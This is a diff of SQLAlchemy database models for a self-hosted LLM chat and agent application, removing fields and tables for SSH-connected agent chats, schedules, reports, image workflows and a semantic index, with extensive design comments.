# and shown as a fingerprint to be confirmed, then pinned. Empty means
# "never seen". Handed to asyncssh as `known_hosts=<these bytes>` and never
# as None, which turns host key checking off altogether.
host_key: Mapped[str] = mapped_column(Text, default="")
# The SHA256 fingerprint of the above, so the profile page can show what was
# accepted without parsing the line again on every render.
host_fingerprint: Mapped[str] = mapped_column(String(120), default="")
# Where a chat starts by default. A chat records its own, chosen when it is
# created and fixed thereafter; this is only the suggestion in the picker.
default_dir: Mapped[str] = mapped_column(String(500), default="")
connect_timeout: Mapped[int] = mapped_column(Integer, default=15, nullable=False)
enabled: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
# What the last connection attempt found, for the list. `server_banner` is
# whatever the host said about itself -- useful for telling two containers
# apart.
last_checked_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
last_error: Mapped[str] = mapped_column(Text, default="")
server_info: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
owner: Mapped[User] = relationship()
@property
def label(self) -> str:
return self.name or f"{self.username}@{self.host}"
@property
def address(self) -> str:
return f"{self.username}@{self.host}" + (f":{self.port}" if self.port != 22 else "")
@property
def verified(self) -> bool:
"""Whether this host's key has been seen and pinned."""
return bool(self.host_key)
def __repr__(self) -> str:
return f"<SshProfile {self.name} {self.address}>"
class Job(Timestamps, Base):
"""A command left running on the far side after the reply that started it.
The durable record behind `services/agent/jobs.py`, which otherwise keeps
only an in-process registry lost on restart. A background job runs for
minutes to hours with nobody watching -- exactly the case a restart must not
forget -- so the row lets a startup hook re-poll the job's deterministic
exit-file and wake the model as if nothing had happened.
The id is `jobs`'s own short hex, not a UUIDPrimaryKey, because the same id
names the files on the machine and is quoted back by the model.
"""
__tablename__ = "agent_jobs"
id: Mapped[str] = mapped_column(String(32), primary_key=True)
chat_id: Mapped[str] = mapped_column(
String(32), ForeignKey("chats.id", ondelete="CASCADE"), index=True, nullable=False
)
command: Mapped[str] = mapped_column(Text, default="")
# running | done | killed | lost. `lost` means it stopped without an exit
# code being recorded -- killed out of band, or the host rebooted under it.
status: Mapped[str] = mapped_column(String(16), default="running", nullable=False)
exit_status: Mapped[int | None] = mapped_column(Integer)
finished_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
def __repr__(self) -> str:
return f"<Job {self.id} {self.status}>"
__all__ = ["AUTH_KEY", "AUTH_METHODS", "AUTH_PASSWORD", "Job", "SshProfile"]
-13
View File
@@ -55,19 +55,6 @@ class Attachment(UUIDPrimaryKey, Timestamps, Base):
# is not left wondering why the model ignored it.
extraction_error: Mapped[str] = mapped_column(Text, default="")
# Where this came from, when it came from somewhere with an address.
#
# `filename` is a display name and is frequently just the basename, which
# is not enough: a model told it has been given `main.py` cannot tell which
# of four it is looking at, and cannot name the file back to you if you ask
# it to change something. So a project file carries its absolute path and
# the machine it was read from, and both go into the tag the model sees.
#
# Nullable, and empty for an ordinary upload -- a file dragged in from a
# laptop has no address this instance could meaningfully report.
source_path: Mapped[str] = mapped_column(String(1000), default="")
source_label: Mapped[str] = mapped_column(String(200), default="")
message: Mapped[Message] = relationship(back_populates="attachments") # noqa: F821
@property
-50
View File
@@ -1,50 +0,0 @@
"""A chat's own working surface."""
from __future__ import annotations
from sqlalchemy import ForeignKey, String, Text
from sqlalchemy.orm import Mapped, mapped_column
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
from lembas.db.models.library import AUTHOR_USER
class ScratchDoc(UUIDPrimaryKey, Timestamps, Base):
"""A text artefact belonging to one chat, written by either side of it.
The model can write into it, the person can edit it, and either can hand the
result to the next message as an ordinary attachment. Distinct from a note,
which is a durable artefact of the reader's that outlives the chat -- this
is the chat's own record of what it is working on, which is the same line
`plan_update` is on rather than `notes_edit`.
A separate table rather than a column on `chats` for one plain reason:
`select(Chat)` runs for the sidebar on every page load, and SQLAlchemy loads
every column -- so a Text body would ride along with two hundred sidebar
rows to answer a question about none of them.
One per chat. Several would mean a picker, names, deletion and a sweep, and
would mean the model choosing an id; one means `scratch:<chat_id>` is
derivable rather than looked up. If several are ever wanted, they are notes.
"""
__tablename__ = "scratch_docs"
chat_id: Mapped[str] = mapped_column(
String(32),
ForeignKey("chats.id", ondelete="CASCADE"),
nullable=False,
index=True,
unique=True,
)
user_id: Mapped[str] = mapped_column(
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
)
title: Mapped[str] = mapped_column(String(300), default="Scratch")
body: Mapped[str] = mapped_column(Text, default="")
# Who wrote it last, so the panel can say. Not authorisation: the chat's
# owner is the only person who can reach it either way.
author: Mapped[str] = mapped_column(String(16), default=AUTHOR_USER, nullable=False)
def __repr__(self) -> str:
return f"<ScratchDoc {self.chat_id}>"
+3 -230
View File
@@ -22,37 +22,6 @@ ROLE_USER = "user"
ROLE_ASSISTANT = "assistant"
ROLE_TOOL = "tool"
# What a conversation is allowed to be. A plain chat can never act; an agent
# chat is pointed at a machine before it starts and stays pointed there.
KIND_CHAT = "chat"
KIND_AGENT = "agent"
# The two sides of the sidebar's Chat/Agent switch, and nothing else.
# `KINDS` must NOT grow: `api/preferences.py:set_sidebar_kind` validates against
# it, so a third entry would make the tree filterable to a side with no button
# to leave it -- the "one side of a fork nobody can move" failure the
# `sidebar_split` guard already exists to prevent.
KINDS = (KIND_CHAT, KIND_AGENT)
# Conversations that belong to a section of their own rather than to the tree.
# A Messages conversation is one per person; a task chat belongs to a schedule
# and is reached through Scheduled. Neither is ever listed among the chats, so
# neither is a side of the switch.
KIND_MESSAGES = "messages"
KIND_TASK = "task"
# What a row's `kind` may actually be. Every listing that means "the sidebar
# tree" filters on KINDS; every check that means "is this a real value" uses
# this. Reading `kind == ""` as "no filter" is what leaks a task chat into the
# ordinary list on an instance with agents switched off, where the sidebar
# passes "" precisely because there is no switch to read.
ALL_KINDS = (*KINDS, KIND_MESSAGES, KIND_TASK)
# Duplicated from services/agent/policy.py rather than imported: a model module
# importing a service would invert the dependency, and this is only the column
# default. policy.MODES is the vocabulary; this is what a row starts as.
MODE_MANUAL = "manual"
class Folder(UUIDPrimaryKey, Timestamps, Base):
"""A user-owned, arbitrarily nested container for chats."""
@@ -69,28 +38,6 @@ class Folder(UUIDPrimaryKey, Timestamps, Base):
position: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
collapsed: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
# What chats started in this folder inherit. A folder is where somebody
# groups the work on one thing, so it is the natural place to say "chats
# about this use this prompt, this model, this machine" -- said once rather
# than on every new chat.
description: Mapped[str] = mapped_column(String(500), default="")
# Read at request time, never copied onto the chat: editing the folder later
# has to reach the chats already in it, which is the whole point of putting
# it here. It slots into the ladder between the chat and the model.
system_prompt: Mapped[str] = mapped_column(Text, default="")
# Seeds, copied onto a new chat and then that chat's own. Empty means "no
# opinion", so a folder can carry a prompt without also dictating a model.
model_id: Mapped[str] = mapped_column(String(300), default="")
kind: Mapped[str] = mapped_column(String(16), default="")
# Deliberately not a ForeignKey. `migrations.py` compiles the column type
# only, so a REFERENCES clause would exist on a fresh database and not on an
# upgraded one -- the same reason `Chat.compacted_through_id` is a plain id.
# The profile may also have been deleted, so it is validated on read.
ssh_profile_id: Mapped[str] = mapped_column(String(32), default="")
project_dir: Mapped[str] = mapped_column(String(1000), default="")
agent_mode: Mapped[str] = mapped_column(String(16), default="")
children: Mapped[list[Folder]] = relationship(
back_populates="parent",
cascade="all, delete-orphan",
@@ -99,7 +46,8 @@ class Folder(UUIDPrimaryKey, Timestamps, Base):
parent: Mapped[Folder | None] = relationship(back_populates="children", remote_side="Folder.id")
chats: Mapped[list[Chat]] = relationship(back_populates="folder")
def visible_chats(self, kind: str = "") -> list[Chat]:
@property
def visible_chats(self) -> list[Chat]:
"""The chats in this folder that belong in the sidebar.
The relationship itself stays unfiltered -- back-population needs every
@@ -109,58 +57,13 @@ class Folder(UUIDPrimaryKey, Timestamps, Base):
existed. The unfiled list has always filtered them (api/pages.py); the
folder branch went through the relationship and filtered nothing.
`kind` narrows to one side of the sidebar's Chat/Agent switch. Empty
means *both sides of the switch* -- which is not the same as "no filter",
and the difference only became visible once a third kind existed. An
instance with agents disabled passes "" because there is no switch to
read, so a bare `not kind` would list every task chat and the Messages
conversation among somebody's ordinary chats. Those have sections of
their own and are never in the tree.
Ordered like the unfiled list: pinned first, then most recently touched.
"""
wanted = (kind,) if kind else KINDS
kept = [
chat
for chat in self.chats
if not chat.archived and not chat.temporary and chat.kind in wanted
]
kept = [chat for chat in self.chats if not chat.archived and not chat.temporary]
kept.sort(key=lambda chat: chat.updated_at, reverse=True)
kept.sort(key=lambda chat: not chat.pinned)
return kept
def visible_children(self, kind: str = "") -> list[Folder]:
"""Sub-folders the sidebar should show on this side of the switch.
Here rather than in the template because Jinja's `selectattr` names a
test, it does not call a method -- so the filter would have to be spelled
out as a loop appending to a list, in a template that already includes
itself recursively.
"""
return [child for child in self.children if child.shown_in(kind)]
def holds(self, kind: str = "") -> bool:
"""Whether anything of this kind is anywhere under this folder.
Recursive, because a folder's only matching chat may be three levels
down and judging on its own contents alone would bury it.
"""
if self.visible_chats(kind):
return True
return any(child.holds(kind) for child in self.children)
def shown_in(self, kind: str = "") -> bool:
"""Whether this folder belongs on one side of the sidebar's switch.
Two different reasons a folder can have nothing in it, and only one of
them is a reason to hide it. A folder full of ordinary chats is noise on
the Agent side and is dropped. A folder that is empty of *everything* is
a container somebody just made and has not filled yet -- hiding that one
means it can never be found again, let alone filed into, so it shows on
both sides and says "Empty" for itself.
"""
return self.holds(kind) or not self.holds()
def __repr__(self) -> str:
return f"<Folder {self.name}>"
@@ -206,84 +109,6 @@ class Chat(UUIDPrimaryKey, Timestamps, Base):
unread: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
unread_notified: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
# --- Agent chats ---------------------------------------------------------
# Whether this conversation may act, and where. Chosen on the new-chat
# screen and fixed once there is a message: the harness, the tools offered
# and the approval loop all differ, so a chat that changed kind halfway
# would have a transcript whose earlier turns were produced under other
# rules. The connection is locked with it -- a shell history and a project
# directory do not transplant to another machine.
kind: Mapped[str] = mapped_column(String(16), default=KIND_CHAT, nullable=False)
# A plain id rather than a ForeignKey, for the reason `compacted_through_id`
# below gives: migrations.py compiles only the column type, so a REFERENCES
# clause would exist on a fresh database and not on an upgraded one.
# Validated on read instead.
ssh_profile_id: Mapped[str | None] = mapped_column(String(32))
# Where commands start on the far side, and what file paths resolve against.
project_dir: Mapped[str] = mapped_column(String(500), default="")
# Which of the four permission modes is in force. The one agent field that
# IS switchable mid-chat: it decides what gets asked about, not what the
# conversation is.
agent_mode: Mapped[str] = mapped_column(String(16), default=MODE_MANUAL, nullable=False)
# Set when a turn was edited or regenerated in an agent chat. The project
# directory is deliberately NOT rewound with the transcript -- it is
# somebody's real working tree and deleting their work would be far worse
# than an inconsistency -- so the harness says so instead.
rewound_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
# Which message carries the plan currently in force. A plain id and not a
# ForeignKey, for the reason `compacted_through_id` below gives; validated
# on read. It exists so the harness can put the plan in front of the model
# with one `db.get` by primary key rather than a scan for "the newest
# message with a plan" -- `context_variables` is synchronous and on the
# request path. A plan a model cannot see is a plan it cannot keep current.
plan_message_id: Mapped[str | None] = mapped_column(String(32))
# What this chat has switched off, narrowing what it is already allowed.
# {"families": {"web_search": false}, "skills": {"weekly-report": false}}.
# **Absent means on**, for every key -- the same convention
# `McpServer.tool_overrides_json` uses, and for the same reason: two
# representations of "on" makes "why is this off?" unanswerable.
scope_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
# What this chat generates pictures with when the model names neither. A
# preference rather than a constraint -- the model may still choose another
# template or checkpoint for a particular image, and the harness lists what
# is on offer -- so this is where "in this chat I am working in SDXL" is
# said once instead of in every prompt.
#
# Plain columns rather than keys in `scope_json`: that one narrows what a
# chat may *reach* and absent means on, which is the opposite of what an
# empty default here means. A workflow that has since been deleted reads
# back as no preference, so it is validated on use like `ssh_profile_id`.
image_workflow_id: Mapped[str | None] = mapped_column(String(32))
image_checkpoint: Mapped[str] = mapped_column(String(300), default="")
# --- Subagents -----------------------------------------------------------
# The chat whose reply spawned this one, when a model delegated a piece of
# work. A plain id and not a ForeignKey, for the reason the three above
# give, and validated on read. Its presence is what makes a chat a
# subagent's: `agent/session.py` sizes it smaller, `services/subagent.py`
# refuses to spawn from one, and the sweep finds it.
parent_chat_id: Mapped[str | None] = mapped_column(String(32))
# Nobody is at the keyboard for this conversation, and nothing in it may
# stop to ask. Not the same question as `kind`: a scheduled task's chat is
# unattended because of what started it, a subagent's because of what it is,
# and a future third thing will be unattended for a third reason. Reading
# the flag rather than the kind is what stops each of those needing its own
# branch in `resolve_tools` and in `_authorise`.
unattended: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
# Which files are open in the canvas panel, and which of them is in front.
# {"tabs": [{"key": "agent:/srv/app/main.py", "title": …, "source": …}],
# "active": "agent:/srv/app/main.py"}
#
# Server-side rather than in the browser because a model reading a file
# opens a tab, and every frame this application streams is HTML swapped
# whole -- if the browser owned the list, the server could not render the
# strip and the frame would have to become data for JavaScript to interpret.
# One chat, one canvas, the same consequence the terminal panel documents:
# two tabs on the same chat share it.
canvas_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
# --- Compaction ----------------------------------------------------------
# A summary of the turns up to `compacted_through_id`, sent in their place.
# The messages themselves are kept and still shown; they simply stop being
@@ -347,30 +172,8 @@ class Message(UUIDPrimaryKey, Timestamps, Base):
# answer stay visible, and deliberately NOT replayed as context on the next
# turn -- see services/generation.py for why.
tool_calls_json: Mapped[list[Any]] = mapped_column(JSONList, default=list)
# Where each round's contribution ended, so `content`, `reasoning` and
# `tool_calls_json` can be shown as the one sequence they actually were
# rather than as three stacked zones. One entry per closed step, holding the
# cumulative length of each of the three at that moment. See
# services/steps.py; read it through the `steps` property below.
#
# Nullable, and that is load-bearing rather than lazy. `migrations.py`
# derives a backfill for a NOT NULL column from `column.type.python_type`,
# and `JSONList` is `MutableList.as_mutable(JSON)` whose `python_type` is
# `dict` -- so a NOT NULL list column would be backfilled `'{}'` on every
# existing row and fail on the first read. Nullable means no default, which
# is what an older row should have anyway: no marks, and the old layout.
steps_json: Mapped[list[Any] | None] = mapped_column(JSONList, nullable=True, default=list)
usage_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
# A plan produced in Plan mode, or the state of one being carried out. See
# services/plans.py for the shape. Marked on the row rather than parsed back
# out of the prose, so the Execute button sends exactly what was proposed
# and not an approximation of it. Read through the `plan` property below,
# never directly: rows written before version 2 hold `{title, steps}`.
plan_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
# Non-empty when generation failed. Rendered as a styled error in the
# thread so a failed turn is never an unexplained blank bubble.
error: Mapped[str] = mapped_column(Text, default="")
@@ -379,23 +182,6 @@ class Message(UUIDPrimaryKey, Timestamps, Base):
# True when the reader pressed Stop. Distinct from `error`: the text that
# did arrive is kept and is perfectly usable, it is just cut short.
stopped: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
# Typed while a reply was still being written, and not yet handed to a
# model. A row rather than something held in the browser: it survives a
# restart, it is in the transcript the moment it is typed, and it can be
# withdrawn before it is ever sent. `build_messages` skips it; delivery --
# `generation._drain` at the end of a reply, or `_inject` between two rounds
# of tool calls -- is the only thing that clears it.
queued: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
# Written by the application rather than by the person whose bubble this
# would otherwise be. `agent/jobs.py:wake` is the one writer: a background
# job finishing is a new turn in the *user* role, and that role is
# load-bearing -- `_inject` sends a queued turn verbatim and `build_messages`
# has to keep seeing a user turn -- but it is not the reader speaking, and
# rendering it under their name with their initial beside it is the
# application putting words in their mouth. Nothing about the request
# changes; only the bubble does.
machine: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
chat: Mapped[Chat] = relationship(back_populates="messages")
attachments: Mapped[list[Attachment]] = relationship( # noqa: F821
@@ -412,18 +198,5 @@ class Message(UUIDPrimaryKey, Timestamps, Base):
def documents(self) -> list:
return [a for a in self.attachments if not a.is_image]
@property
def plan(self) -> dict:
"""The plan, always in the current shape.
A property for the reason `images` and `documents` are: a message bubble
is rendered from four different handlers, and every one of them would
otherwise have to remember to normalise. Rows written before version 2
hold `{title, steps}` and come back through here as one phase.
"""
from lembas.services import plans
return plans.normalise(self.plan_json)
def __repr__(self) -> str:
return f"<Message {self.role} {self.content[:40]!r}>"
-12
View File
@@ -58,18 +58,6 @@ class Connection(UUIDPrimaryKey, Timestamps, Base):
# Extra headers merged into every request (e.g. OpenRouter's HTTP-Referer).
extra_headers_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
# How to ask this endpoint to drop its model from memory, for the Preserve
# VRAM option in image generation. Per connection and not instance-wide,
# because the VRAM being freed is a particular machine's: llama-swap on this
# host answers `GET /unload`, while a remote vLLM has no such call and no
# reason to be unloaded when ComfyUI needs memory *here*.
#
# Empty means "this connection cannot be unloaded", which is the honest
# default -- there is no call that works everywhere, and guessing one would
# send an unexplained request to somebody's endpoint.
unload_url: Mapped[str] = mapped_column(String(500), default="")
unload_method: Mapped[str] = mapped_column(String(8), default="POST")
# Result of the most recent "Test & refresh", surfaced in the admin list.
last_checked_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
last_error: Mapped[str] = mapped_column(Text, default="")
-60
View File
@@ -1,60 +0,0 @@
"""ComfyUI workflow templates an administrator saved.
A table rather than a list inside the settings group, for the reason
`McpServer.tools_json` is *not* a table: that one is a cache of somebody else's
document, replaced wholesale on every refresh, where each entry carries one
decision. These are the opposite -- authored by hand, individually named,
edited, reordered and deleted, and referenced by id from a chat. Everything a
table gives for free is exactly what is wanted.
Deliberately **no group access list**, unlike `CustomTool`. The whole feature is
already behind one capability flag and one permission; a second access system
covering which templates a person may pick would be a screen of checkboxes
nobody asked for, and the thing being restricted is the shape of a picture.
"""
from __future__ import annotations
from datetime import datetime
from typing import Any
from sqlalchemy import Boolean, DateTime, Integer, String, Text
from sqlalchemy.orm import Mapped, mapped_column
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
from lembas.db.types import JSONDict
class ImageWorkflow(UUIDPrimaryKey, Timestamps, Base):
"""One API-format ComfyUI workflow, with holes where the values go."""
__tablename__ = "image_workflows"
# What the *model* names when it picks this one, so it is short and
# lowercase for the same reason a tool's slug is: it lands in a schema enum
# and is generated by something that spells inconsistently.
slug: Mapped[str] = mapped_column(String(64), unique=True, nullable=False)
name: Mapped[str] = mapped_column(String(120), nullable=False)
# Sent to the model beside the slug, and the only thing it has to choose
# with. "Photographic, SDXL, slow" is a choice; "workflow 2" is not.
description: Mapped[str] = mapped_column(Text, default="")
# The workflow itself, in ComfyUI's API format, with `{{placeholders}}`
# where the parameters go. Stored parsed rather than as text so the admin
# form can only ever save something that is valid JSON -- a template that
# does not parse would fail at generation time, minutes later, in front of
# somebody who was not editing it.
workflow_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
enabled: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
position: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
# The result of the last time somebody pressed Test, in the shape
# `CustomTool` and `McpServer` already use, so the row reads the same way in
# the list as theirs do.
last_checked_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
last_error: Mapped[str] = mapped_column(Text, default="")
def __repr__(self) -> str:
return f"<ImageWorkflow {self.slug}>"
-74
View File
@@ -29,7 +29,6 @@ from sqlalchemy import (
ForeignKey,
Index,
Integer,
LargeBinary,
String,
Table,
Text,
@@ -53,13 +52,6 @@ SOURCE_LINK = "link"
RESOURCE_BASE = "base"
RESOURCE_NOTE = "note"
RESOURCE_SKILL = "skill"
# A report is shareable and a memory is not, and the line between them is the
# one already drawn elsewhere: a finished piece of work is exactly the thing
# somebody wants to hand over, and a record *about a person* is not content to
# pass round. The constant lives here beside the other three even though Report
# is not a library model, because `Share.resource_type` is one column and its
# vocabulary belongs in one place.
RESOURCE_REPORT = "report"
PRINCIPAL_USER = "user"
PRINCIPAL_GROUP = "group"
@@ -294,69 +286,3 @@ class Share(UUIDPrimaryKey, Timestamps, Base):
Index("ix_shares_resource", Share.resource_type, Share.resource_id)
Index("ix_shares_principal", Share.principal_type, Share.principal_id)
# --- Semantic index -----------------------------------------------------------
# What a chunk belongs to. Strings rather than a foreign key per store, because
# one table serving four of them is what stops the chunking, the scoring and the
# rebuild being written four times and drifting three ways.
CHUNK_DOCUMENT = "document"
CHUNK_NOTE = "note"
CHUNK_SKILL = "skill"
CHUNK_REPORT = "report"
CHUNK_KINDS = (CHUNK_DOCUMENT, CHUNK_NOTE, CHUNK_SKILL, CHUNK_REPORT)
class Chunk(UUIDPrimaryKey, Timestamps, Base):
"""A piece of one library record, and its embedding.
**Additive, so `sync_schema` creates it at startup with no manual step**, and
absent-means-nothing: an instance with no embedding model chosen never writes
a row here and the search behaves exactly as it always did.
`owner_id` is denormalised off the resource. It is not used for
authorisation -- `services/sharing.py` is still the only definition of who
may see what, and scoring happens before that filter exactly as the
full-text path does -- but it is what makes "rebuild this person's index"
and "drop everything of theirs" one indexed query rather than four joins.
No foreign key on `resource_id`, for the reason `Share.principal_id` has
none: the column points at one of four tables depending on `resource_type`,
which SQLite cannot express. `indexing.forget_resource` deletes the rows.
"""
__tablename__ = "chunks"
owner_id: Mapped[str] = mapped_column(
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
)
resource_type: Mapped[str] = mapped_column(String(16), nullable=False)
resource_id: Mapped[str] = mapped_column(String(32), nullable=False)
# Where in the record this piece came from, so a set can be rebuilt in order
# and a hit can say which part matched.
ordinal: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
text: Mapped[str] = mapped_column(Text, default="")
# float32, little-endian, packed. A BLOB rather than JSON because a 1024
# dimension vector is 4KB packed and about 20KB as text, and every one of
# them is read on every semantic search.
vector: Mapped[bytes] = mapped_column(LargeBinary, nullable=False)
# How many floats are in it. Stored rather than derived from the length so a
# mismatch is a comparison this code refuses rather than one it gets wrong:
# changing the embedding model changes the space, and vectors from two
# spaces score against each other perfectly happily and mean nothing.
dims: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
# Which model wrote it, for the same reason. A rebuild is what reconciles
# them; until then the odd ones out are ignored rather than trusted.
model_id: Mapped[str] = mapped_column(String(300), default="")
# A hash of the text this set was built from. What makes re-indexing an
# unchanged record free, and what makes "is this index current?" answerable
# without re-embedding anything.
source_hash: Mapped[str] = mapped_column(String(64), default="")
def __repr__(self) -> str:
return f"<Chunk {self.resource_type}:{self.resource_id}#{self.ordinal}>"
Index("ix_chunks_resource", Chunk.resource_type, Chunk.resource_id)
-75
View File
@@ -1,75 +0,0 @@
"""Reports: what was found, written down once and never replied to."""
from __future__ import annotations
from sqlalchemy import Boolean, ForeignKey, String, Text
from sqlalchemy.orm import Mapped, mapped_column
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
# Where a report came from. Not a foreign key to anything -- see `source_id`.
SOURCE_SCHEDULE = "schedule"
SOURCE_CHAT = "chat"
SOURCE_MANUAL = "manual"
SOURCES = (SOURCE_SCHEDULE, SOURCE_CHAT, SOURCE_MANUAL)
class Report(UUIDPrimaryKey, Timestamps, Base):
"""A finished piece of work, filed.
Deliberately not a `Chat` with one `Message` in it. A report is read top to
bottom and never answered, so everything a conversation carries -- a
composer, a sidebar row, a title that regenerates itself, a bubble with an
avatar and a rewind button -- would be machinery to suppress rather than
machinery to use. It is the same line `services/library/` already draws
between a note and a chat: a durable artefact is not a turn.
It must also be writable with no chat behind it at all, being the fallback
destination for a scheduled run whose own chat has gone.
`body` is Markdown written by a model and goes through
`services/markdown.py` like everything else from an endpoint. Hard rule 6
applies here exactly as it does in a transcript.
"""
__tablename__ = "reports"
owner_id: Mapped[str] = mapped_column(
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
)
title: Mapped[str] = mapped_column(String(300), nullable=False)
# One line for the list page, so a feed of forty reports can be read without
# opening any of them. Written by the model beside the body; falls back to
# the body's first line when it did not bother.
summary: Mapped[str] = mapped_column(String(500), default="")
body: Mapped[str] = mapped_column(Text, default="")
source: Mapped[str] = mapped_column(String(16), default=SOURCE_MANUAL, nullable=False)
# The chat or the schedule this came out of, kept so a report can say where
# it was made. Deliberately not a ForeignKey: `migrations.py` compiles the
# column type only, so a REFERENCES clause would exist on a fresh database
# and not on an upgraded one -- the same reason `Chat.compacted_through_id`
# and `Folder.ssh_profile_id` are plain ids. Both are validated on read, and
# the row outliving what it points at is normal rather than exceptional: a
# report is worth keeping after the chat that produced it has been deleted.
source_id: Mapped[str] = mapped_column(String(32), default="")
schedule_id: Mapped[str] = mapped_column(String(32), default="")
model_id: Mapped[str] = mapped_column(String(300), default="")
# NOT NULL with a scalar default so `migrations._add_column_sql` can backfill
# it if this column is ever added to a table that already has rows.
unread: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
# Whether its arrival has already been announced. The dot can be shown for
# as long as it is unread; the toast and the browser notification must fire
# once. Without this the poll would announce the same report every ten
# seconds until somebody opened it, which is the shape of notification
# nobody leaves switched on. `Chat.unread_notified` exists for exactly this
# and this is the same pair.
unread_notified: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
# Why a run produced nothing worth reading. A scheduled report that failed
# is still a report -- one that silently did not appear is indistinguishable
# from a schedule that never fired.
error: Mapped[str] = mapped_column(Text, default="")
def __repr__(self) -> str:
return f"<Report {self.title!r}>"
-85
View File
@@ -1,85 +0,0 @@
"""Schedules: what should happen later, and where its result goes."""
from __future__ import annotations
from datetime import datetime
from sqlalchemy import Boolean, DateTime, ForeignKey, Integer, String, Text
from sqlalchemy.orm import Mapped, mapped_column
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
from lembas.db.types import JSONDict
# Where a firing's result is delivered. Chosen per schedule rather than fixed by
# the screen it was made on: Reports has to stay reachable from anywhere, being
# the fallback, and a schedule somebody wants moved from its own chat to Reports
# should not have to be built again.
TARGET_CHAT = "chat"
TARGET_REPORT = "report"
TARGET_MESSAGES = "messages"
TARGETS = (TARGET_CHAT, TARGET_REPORT, TARGET_MESSAGES)
# Who made it. Kept because "why is this running?" is a question with two very
# different answers, and one of them is "a model decided to".
ORIGIN_USER = "user"
ORIGIN_MODEL = "model"
ORIGINS = (ORIGIN_USER, ORIGIN_MODEL)
class Schedule(UUIDPrimaryKey, Timestamps, Base):
"""One standing instruction and when it comes due.
The row carries no recurrence logic at all: `rule_json` is read by
`services/schedule/rule.py`, which is pure and knows nothing about rows.
What lives here is the bookkeeping the ticker needs to claim a firing
without doing it twice.
"""
__tablename__ = "schedules"
user_id: Mapped[str] = mapped_column(
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
)
title: Mapped[str] = mapped_column(String(200), nullable=False, default="")
# What the reader actually typed, kept verbatim and for ever. The compile
# rewrites it into `instruction`, and "what did I actually ask for" has to
# survive that -- both so the edit form can show it and so a recompile has
# something to work from other than its own previous output.
request: Mapped[str] = mapped_column(Text, default="")
# What is sent when it fires. The compiled form: standalone, since it is
# read with no conversation around it.
instruction: Mapped[str] = mapped_column(Text, default="")
rule_json: Mapped[dict] = mapped_column(JSONDict, default=dict)
target: Mapped[str] = mapped_column(String(16), default=TARGET_CHAT, nullable=False)
# The chat this fires into. Deliberately not a ForeignKey -- `migrations.py`
# compiles the column type only, so a REFERENCES clause would exist on a
# fresh database and not on an upgraded one. Validated on read, and a
# dangling value disables the schedule rather than raising every tick.
chat_id: Mapped[str] = mapped_column(String(32), default="")
model_id: Mapped[str] = mapped_column(String(300), default="")
enabled: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
# The ticker's entire query. Nullable because "nothing more to do" is a real
# state -- a spent count, a closed window, a calendar matching nothing --
# and is different from "due at the epoch".
next_fire_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True), index=True)
last_fire_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
# Stamped when a firing starts and cleared when it finishes, so a run that
# died halfway says so instead of looking like one that never happened.
claimed_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
fired_count: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
# Why the last run did not work. Shown on the schedule's own page: a
# schedule that silently stopped producing anything is indistinguishable
# from one that was never due.
last_error: Mapped[str] = mapped_column(Text, default="")
origin: Mapped[str] = mapped_column(String(16), default=ORIGIN_USER, nullable=False)
compiled_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
def __repr__(self) -> str:
return f"<Schedule {self.title!r} {'on' if self.enabled else 'off'}>"
+3 -3
View File
@@ -20,9 +20,9 @@ class Suggestion(UUIDPrimaryKey, Timestamps, Base):
name: Mapped[str] = mapped_column(String(120), nullable=False)
description: Mapped[str] = mapped_column(String(300), default="")
# Sent as the first message the moment the card is clicked, so it has to
# stand on its own -- there is no chance to add anything to it first. The
# built-ins ask for what they need rather than assuming material.
# What lands in the composer. Deliberately not sent on its own: it usually
# ends mid-sentence, because a card is a starting point rather than a
# question somebody already asked.
prompt: Mapped[str] = mapped_column(Text, default="")
enabled: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
-187
View File
@@ -1,187 +0,0 @@
"""Tools an administrator defined: HTTP endpoints and remote MCP servers.
Both are instance configuration rather than someone's content, so access is
shaped like `Model` and not like a note: a row is either public or reachable
through the groups it names, resolved the way `permissions.models_visible_to`
resolves a model. There is deliberately no per-user tool. A tool is a credential
pointed at a third party, and "anyone may define one" is a different feature
with a different threat model.
The two tables are near-twins on purpose -- name, slug, secret, group list,
last check -- because an administrator adding one should not have to learn a
